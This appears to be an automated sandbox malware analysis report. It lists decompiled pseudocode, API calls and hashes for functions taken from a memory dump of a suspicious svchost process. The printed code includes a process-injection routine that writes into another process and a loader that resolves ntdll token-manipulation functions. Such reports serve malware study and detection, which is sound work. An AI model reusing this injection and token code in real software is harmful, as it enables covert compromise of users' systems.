                                                                                                                                  0x0251dbce
                                                                                                                                  0x0251db89
                                                                                                                                  0x0251db89
                                                                                                                                  0x0251db94
                                                                                                                                  0x0251db96
                                                                                                                                  0x0251db9d
                                                                                                                                  0x0251db9d
                                                                                                                                  0x0251dba4
                                                                                                                                  0x0251dbc2
                                                                                                                                  0x0251dbc9
                                                                                                                                  0x0251dbc9

                                                                                                                                  APIs
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(0251DC19,?,00000104), ref: 0251DB7F
                                                                                                                                  • lstrcpyA.KERNEL32(?,025228F8), ref: 0251DBA4
                                                                                                                                  • CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000080,00000000), ref: 0251DBC2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEnvironmentFileVariablelstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2536392590-0
                                                                                                                                  • Opcode ID: d6e7cae19a8a2b67c946293bf1a6fdb49510825dcb349f52ee257249b41da189
                                                                                                                                  • Instruction ID: 6fa6a3541d60cd18aac819806452c854b18e0045806d0d021df25ec5ceac5fb9
                                                                                                                                  • Opcode Fuzzy Hash: d6e7cae19a8a2b67c946293bf1a6fdb49510825dcb349f52ee257249b41da189
                                                                                                                                  • Instruction Fuzzy Hash: AEF0BE70540209ABFF21DF64DC89FE93B69BB10308F6045A4BB91A40D0D7F2D599DF28
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 025130B5 Relevance: 3.0, APIs: 2, Instructions: 29networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E025130B5() {
				char _v132;
				char* _t9;
				void* _t14;
				void* _t15;

				E0251EE2A(_t14,  &_v132, 0, 0x80);
				gethostname( &_v132, 0x80); // executed
				_t9 =  &_v132;
				__imp__#52(_t9, _t15); // executed
				if(_t9 == 0) {
					return 0;
				} else {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc))))));
				}
			}







                                                                                                                                  0x025130cb
                                                                                                                                  0x025130d8
                                                                                                                                  0x025130de
                                                                                                                                  0x025130e2
                                                                                                                                  0x025130eb
                                                                                                                                  0x025130f9
                                                                                                                                  0x025130ed
                                                                                                                                  0x025130f5
                                                                                                                                  0x025130f5

                                                                                                                                  APIs
                                                                                                                                  • gethostname.WS2_32(?,00000080), ref: 025130D8
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 025130E2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbynamegethostname
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3961807697-0
                                                                                                                                  • Opcode ID: 885bd949bd11788b8109eacc355d3a00868f3edc845a2bf28f42cb507457d6d6
                                                                                                                                  • Instruction ID: 3714b2746f38d2b5075dbc21088b9b2e2c09046b6eb281b6cca6284f5c24f191
                                                                                                                                  • Opcode Fuzzy Hash: 885bd949bd11788b8109eacc355d3a00868f3edc845a2bf28f42cb507457d6d6
                                                                                                                                  • Instruction Fuzzy Hash: 5BE09B71D01119ABDF10DBA8EC85F9A77ECFF05308F080561F905E3280EA34E5088794
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251EC2E Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251EC2E(void* _a4) {
				void* _t2;
				char _t5;
				void* _t7;

				_t7 = _a4;
				if(_t7 != 0) {
					E0251EBA0(_t7);
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _t7); // executed
					return _t5;
				}
				return _t2;
			}






                                                                                                                                  0x0251ec2f
                                                                                                                                  0x0251ec35
                                                                                                                                  0x0251ec38
                                                                                                                                  0x0251ec48
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ec48
                                                                                                                                  0x0251ec4f

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0251EBA0: GetProcessHeap.KERNEL32(00000000,00000000,0251EC0A,00000000,80000001,?,0251DB55,7FFF0001), ref: 0251EBAD
                                                                                                                                    • Part of subcall function 0251EBA0: HeapSize.KERNEL32(00000000,?,0251DB55,7FFF0001), ref: 0251EBB4
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,0251EA27,00000000,0251EA27,00000000), ref: 0251EC41
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000), ref: 0251EC48
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$FreeSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1305341483-0
                                                                                                                                  • Opcode ID: cf13d15db12c796a408779a911764f083ebc6d16c2f8d5a6278870663028be3e
                                                                                                                                  • Instruction ID: 1559fb3def3127327b310506beadde7eb1237825d24cd9e1c4930f0e5bb286da
                                                                                                                                  • Opcode Fuzzy Hash: cf13d15db12c796a408779a911764f083ebc6d16c2f8d5a6278870663028be3e
                                                                                                                                  • Instruction Fuzzy Hash: 4EC012328472306BD5613A50BC0EF9B6B58BFD6711F0A0809F805660C0876058455AE9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251EBCC Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251EBCC(long _a4) {
				void* _t3;
				void* _t7;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t3;
				E0251EB74(_t7);
				return _t7;
			}





                                                                                                                                  0x0251ebda
                                                                                                                                  0x0251ebe0
                                                                                                                                  0x0251ebe3
                                                                                                                                  0x0251ebec

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,80000001,0251EBFE,7FFF0001,?,0251DB55,7FFF0001), ref: 0251EBD3
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0251DB55,7FFF0001), ref: 0251EBDA
                                                                                                                                    • Part of subcall function 0251EB74: GetProcessHeap.KERNEL32(00000000,00000000,0251EC28,00000000,?,0251DB55,7FFF0001), ref: 0251EB81
                                                                                                                                    • Part of subcall function 0251EB74: HeapSize.KERNEL32(00000000,?,0251DB55,7FFF0001), ref: 0251EB88
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocateSize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2559512979-0
                                                                                                                                  • Opcode ID: 2431643ef6099d53a9b4f2bec657828df0de18a1e1b4c183e046469ea0d0feb9
                                                                                                                                  • Instruction ID: 65fc230762ac7c4c902d554055635330cba3f7ab69eadfe3e11a97eb06718969
                                                                                                                                  • Opcode Fuzzy Hash: 2431643ef6099d53a9b4f2bec657828df0de18a1e1b4c183e046469ea0d0feb9
                                                                                                                                  • Instruction Fuzzy Hash: 16C0803294523067D6113BA4BC0DF9A3E94FF95352F050404F505C11D0C73448549799
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251F43E Relevance: 1.5, APIs: 1, Instructions: 33networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • recv.WS2_32(000000C8,?,00000000,0251CA44), ref: 0251F476
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: recv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1507349165-0
                                                                                                                                  • Opcode ID: e39cf05d360cd33612f387f7740cb1f252fd7b8fd60044be270f61a6c07b9264
                                                                                                                                  • Instruction ID: 080b872314b5c3064a27feb791e7b07813d3d37f71226bc10c054bfe0965761f
                                                                                                                                  • Opcode Fuzzy Hash: e39cf05d360cd33612f387f7740cb1f252fd7b8fd60044be270f61a6c07b9264
                                                                                                                                  • Instruction Fuzzy Hash: 09F0823220164AABAB119E59DC84CAB3FAEFBC92107040522FA04D3110D771D8248B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02511978 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E02511978(intOrPtr _a4, signed short _a8) {
				void* _t4;
				void* _t8;

				_t8 = 0;
				_t4 = E0251F428(_a4, _a8 & 0x0000ffff);
				if(_t4 > 0) {
					_t8 = 1; // executed
					__imp__#3(_t4); // executed
				}
				return _t8;
			}





                                                                                                                                  0x02511983
                                                                                                                                  0x02511985
                                                                                                                                  0x0251198e
                                                                                                                                  0x02511991
                                                                                                                                  0x02511992
                                                                                                                                  0x02511992
                                                                                                                                  0x0251199b

                                                                                                                                  APIs
                                                                                                                                  • closesocket.WS2_32(00000000), ref: 02511992
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: closesocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2781271927-0
                                                                                                                                  • Opcode ID: 7c14b870e33822b16230c0893e1ff9a17c9585be8056185f948ca61138bc51d9
                                                                                                                                  • Instruction ID: 35c163357cf43c429cb333df9b65c43c99b4fedca6104beb31de7c57b888ff40
                                                                                                                                  • Opcode Fuzzy Hash: 7c14b870e33822b16230c0893e1ff9a17c9585be8056185f948ca61138bc51d9
                                                                                                                                  • Instruction Fuzzy Hash: 5DD022221486326A62102718F80047FAB8CEF45262701941BFC48C0080C730C84187A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251DD84 Relevance: 1.3, APIs: 1, Instructions: 31stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251DD84(intOrPtr _a4, CHAR* _a8) {
				intOrPtr _t7;
				int _t10;
				intOrPtr* _t12;
				intOrPtr _t13;
				void* _t14;

				_t12 = 0x25220e4;
				_t14 =  *0x25220e4 - 0x25220e4; // 0x2a05278
				if(_t14 == 0) {
					L6:
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					_t7 = _a4;
					_t13 =  *_t12;
					if(_t7 == 0xffffffff ||  *((intOrPtr*)(_t13 + 0xc)) == _t7) {
						if(_a8 == 0) {
							L8:
							return _t13;
						}
						_t5 = _t13 + 0x10; // 0x80000011
						_t10 = lstrcmpiA(_t5, _a8); // executed
						if(_t10 == 0) {
							goto L8;
						}
					}
					_t12 =  *_t12;
				} while ( *_t12 != 0x25220e4);
				goto L6;
			}








                                                                                                                                  0x0251dd8c
                                                                                                                                  0x0251dd8e
                                                                                                                                  0x0251dd94
                                                                                                                                  0x0251ddc5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251dd96
                                                                                                                                  0x0251dd96
                                                                                                                                  0x0251dd96
                                                                                                                                  0x0251dd9a
                                                                                                                                  0x0251dd9f
                                                                                                                                  0x0251ddab
                                                                                                                                  0x0251ddcb
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ddcb
                                                                                                                                  0x0251ddb1
                                                                                                                                  0x0251ddb5
                                                                                                                                  0x0251ddbd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ddbd
                                                                                                                                  0x0251ddbf
                                                                                                                                  0x0251ddc1
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • lstrcmpiA.KERNEL32(80000011,00000000,00000108,80000001,00000000,0251DE62,80000001,80000005,00000108,00000000,000000E4,00000000,?,0251E3A7,000000F0), ref: 0251DDB5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                  • Opcode ID: eb6440ecba2c7cfbc05611328c34e489679dbcb21b428d33cf053470f8f128d1
                                                                                                                                  • Instruction ID: 6bdbe4c68fb7ac5befdb2ae626bff46b169b2e9a938ed7d1b27e119e2ab69547
                                                                                                                                  • Opcode Fuzzy Hash: eb6440ecba2c7cfbc05611328c34e489679dbcb21b428d33cf053470f8f128d1
                                                                                                                                  • Instruction Fuzzy Hash: 38F08C36202212CBEB30CE249884666BBF8FB87229F194C2EE655D2180D730D859DB19
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 0251637C Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
				void* _v8;
				void* _t15;
				void* _t16;
				long _t26;
				struct HINSTANCE__* _t32;
				void* _t37;

				if(_a8 != 0) {
					_t32 = GetModuleHandleA(0);
					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50);
					_t15 = VirtualAlloc(0, _t26, 0x1000, 4);
					_v8 = _t15;
					if(_t15 == 0) {
						L5:
						_t16 = 0;
					} else {
						E0251EE08(_t15, _t32, _t26);
						_t37 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40);
						if(_t37 == 0) {
							goto L5;
						} else {
							E025162B7(_v8, _t37);
							if(WriteProcessMemory(_a8, _t37, _v8, _t26, 0) != 0) {
								 *_a16 = _t37;
								 *_a12 = _t37 - _t32 + _a4;
								_t16 = 1;
							} else {
								goto L5;
							}
						}
					}
					return _t16;
				} else {
					return 0;
				}
			}









                                                                                                                                  0x02516384
                                                                                                                                  0x02516395
                                                                                                                                  0x0251639a
                                                                                                                                  0x025163a9
                                                                                                                                  0x025163af
                                                                                                                                  0x025163b4
                                                                                                                                  0x025163f5
                                                                                                                                  0x025163f5
                                                                                                                                  0x025163b6
                                                                                                                                  0x025163b9
                                                                                                                                  0x025163d0
                                                                                                                                  0x025163d4
                                                                                                                                  0x00000000
                                                                                                                                  0x025163d6
                                                                                                                                  0x025163da
                                                                                                                                  0x025163f3
                                                                                                                                  0x025163fc
                                                                                                                                  0x02516406
                                                                                                                                  0x0251640a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x025163f3
                                                                                                                                  0x025163d4
                                                                                                                                  0x0251640f
                                                                                                                                  0x02516386
                                                                                                                                  0x02516389
                                                                                                                                  0x02516389

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02519816,EntryPoint), ref: 0251638F
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,02519816,EntryPoint), ref: 025163A9
                                                                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 025163CA
                                                                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 025163EB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1965334864-0
                                                                                                                                  • Opcode ID: 94554eecabd2948df3982f2e2178bbd9f5abe5e365735f2f7e86172fdc095b3b
                                                                                                                                  • Instruction ID: 2b42308ce33153b3ff22cddb5d3deee82d07a0e38c0a749fd0f0afee07084af7
                                                                                                                                  • Opcode Fuzzy Hash: 94554eecabd2948df3982f2e2178bbd9f5abe5e365735f2f7e86172fdc095b3b
                                                                                                                                  • Instruction Fuzzy Hash: D41191B1A01219BFEB218E65DC49F9B3FACFB057A4F014464F914E72C0D770DC148AA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02511000 Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02511000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				struct HINSTANCE__* _t17;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t31;
				struct HINSTANCE__* _t32;
				struct HINSTANCE__* _t33;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x2523918; // 0x0
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x252391c == 0 ||  *0x2523920 == 0 ||  *0x2523924 == 0 ||  *0x2523928 == 0 ||  *0x252392c == 0 ||  *0x2523930 == 0 ||  *0x2523934 == 0 ||  *0x2523938 == 0 ||  *0x252393c == 0 ||  *0x2523940 == 0 ||  *0x2523944 == 0 ||  *0x2523948 == 0 ||  *0x252394c == 0 ||  *0x2523950 == 0 ||  *0x2523954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x252391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t5 =  *0x2523918; // 0x0
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
							 *0x2523920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t25 =  *0x2523918; // 0x0
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress(_t25, "NtTerminateProcess");
								 *0x2523924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t30 =  *0x2523918; // 0x0
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress(_t30, "RtlFreeSid");
									 *0x2523928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t9 =  *0x2523918; // 0x0
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
										 *0x252392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
											_t26 =  *0x2523918; // 0x0
											_t35 = 0xfffffffa;
											_t11 = GetProcAddress(_t26, "NtSetInformationThread");
											 *0x2523930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t31 =  *0x2523918; // 0x0
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress(_t31, "NtSetInformationToken");
												 *0x2523934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t13 =  *0x2523918; // 0x0
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
													 *0x2523938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t27 =  *0x2523918; // 0x0
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress(_t27, "NtClose");
														 *0x252393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t32 =  *0x2523918; // 0x0
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
															 *0x2523940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t17 =  *0x2523918; // 0x0
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress(_t17, "NtDuplicateToken");
																 *0x2523944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t28 =  *0x2523918; // 0x0
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
																	 *0x2523948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t33 =  *0x2523918; // 0x0
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress(_t33, "NtFilterToken");
																		 *0x252394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t21 =  *0x2523918; // 0x0
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress(_t21, "RtlLengthSid");
																			 *0x2523950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t29 =  *0x2523918; // 0x0
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
																				 *0x2523954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x2523918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}




































                                                                                                                                  0x02511000
                                                                                                                                  0x02511006
                                                                                                                                  0x0251100b
                                                                                                                                  0x02511023
                                                                                                                                  0x0251102a
                                                                                                                                  0x025110c2
                                                                                                                                  0x025110c4
                                                                                                                                  0x025110cb
                                                                                                                                  0x0251127b
                                                                                                                                  0x0251127b
                                                                                                                                  0x025110d1
                                                                                                                                  0x025110d1
                                                                                                                                  0x025110dc
                                                                                                                                  0x025110e1
                                                                                                                                  0x025110e3
                                                                                                                                  0x025110ea
                                                                                                                                  0x00000000
                                                                                                                                  0x025110f0
                                                                                                                                  0x025110f0
                                                                                                                                  0x025110fc
                                                                                                                                  0x02511101
                                                                                                                                  0x02511103
                                                                                                                                  0x0251110a
                                                                                                                                  0x00000000
                                                                                                                                  0x02511110
                                                                                                                                  0x02511110
                                                                                                                                  0x0251111c
                                                                                                                                  0x02511121
                                                                                                                                  0x02511123
                                                                                                                                  0x0251112a
                                                                                                                                  0x00000000
                                                                                                                                  0x02511130
                                                                                                                                  0x02511130
                                                                                                                                  0x0251113b
                                                                                                                                  0x02511140
                                                                                                                                  0x02511142
                                                                                                                                  0x02511149
                                                                                                                                  0x00000000
                                                                                                                                  0x0251114f
                                                                                                                                  0x0251114f
                                                                                                                                  0x0251115b
                                                                                                                                  0x02511160
                                                                                                                                  0x02511162
                                                                                                                                  0x02511169
                                                                                                                                  0x00000000
                                                                                                                                  0x0251116f
                                                                                                                                  0x0251116f
                                                                                                                                  0x0251117b
                                                                                                                                  0x02511180
                                                                                                                                  0x02511182
                                                                                                                                  0x02511189
                                                                                                                                  0x00000000
                                                                                                                                  0x0251118f
                                                                                                                                  0x0251118f
                                                                                                                                  0x0251119a
                                                                                                                                  0x0251119f
                                                                                                                                  0x025111a1
                                                                                                                                  0x025111a8
                                                                                                                                  0x00000000
                                                                                                                                  0x025111ae
                                                                                                                                  0x025111ae
                                                                                                                                  0x025111ba
                                                                                                                                  0x025111bf
                                                                                                                                  0x025111c1
                                                                                                                                  0x025111c8
                                                                                                                                  0x00000000
                                                                                                                                  0x025111ce
                                                                                                                                  0x025111ce
                                                                                                                                  0x025111da
                                                                                                                                  0x025111df
                                                                                                                                  0x025111e1
                                                                                                                                  0x025111e8
                                                                                                                                  0x00000000
                                                                                                                                  0x025111ee
                                                                                                                                  0x025111ee
                                                                                                                                  0x025111f9
                                                                                                                                  0x025111fe
                                                                                                                                  0x02511200
                                                                                                                                  0x02511207
                                                                                                                                  0x00000000
                                                                                                                                  0x02511209
                                                                                                                                  0x02511209
                                                                                                                                  0x02511215
                                                                                                                                  0x0251121a
                                                                                                                                  0x0251121c
                                                                                                                                  0x02511223
                                                                                                                                  0x00000000
                                                                                                                                  0x02511225
                                                                                                                                  0x02511225
                                                                                                                                  0x02511231
                                                                                                                                  0x02511236
                                                                                                                                  0x02511238
                                                                                                                                  0x0251123f
                                                                                                                                  0x00000000
                                                                                                                                  0x02511241
                                                                                                                                  0x02511241
                                                                                                                                  0x0251124c
                                                                                                                                  0x02511251
                                                                                                                                  0x02511253
                                                                                                                                  0x0251125a
                                                                                                                                  0x00000000
                                                                                                                                  0x0251125c
                                                                                                                                  0x0251125c
                                                                                                                                  0x02511268
                                                                                                                                  0x0251126d
                                                                                                                                  0x0251126f
                                                                                                                                  0x02511276
                                                                                                                                  0x02511276
                                                                                                                                  0x02511279
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511279
                                                                                                                                  0x0251125a
                                                                                                                                  0x0251123f
                                                                                                                                  0x02511223
                                                                                                                                  0x02511207
                                                                                                                                  0x025111e8
                                                                                                                                  0x025111c8
                                                                                                                                  0x025111a8
                                                                                                                                  0x02511189
                                                                                                                                  0x02511169
                                                                                                                                  0x02511149
                                                                                                                                  0x0251112a
                                                                                                                                  0x0251110a
                                                                                                                                  0x025110ea
                                                                                                                                  0x0251127f
                                                                                                                                  0x025110ae
                                                                                                                                  0x025110b4
                                                                                                                                  0x025110b4
                                                                                                                                  0x0251100d
                                                                                                                                  0x02511012
                                                                                                                                  0x02511018
                                                                                                                                  0x0251101f
                                                                                                                                  0x00000000
                                                                                                                                  0x02511022
                                                                                                                                  0x02511022
                                                                                                                                  0x02511022
                                                                                                                                  0x0251101f

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,00000000,02511839,02519646), ref: 02511012
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 025110C2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 025110E1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 02511101
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 02511121
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 02511140
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 02511160
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 02511180
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0251119F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtClose), ref: 025111BF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 025111DF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 025111FE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0251121A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
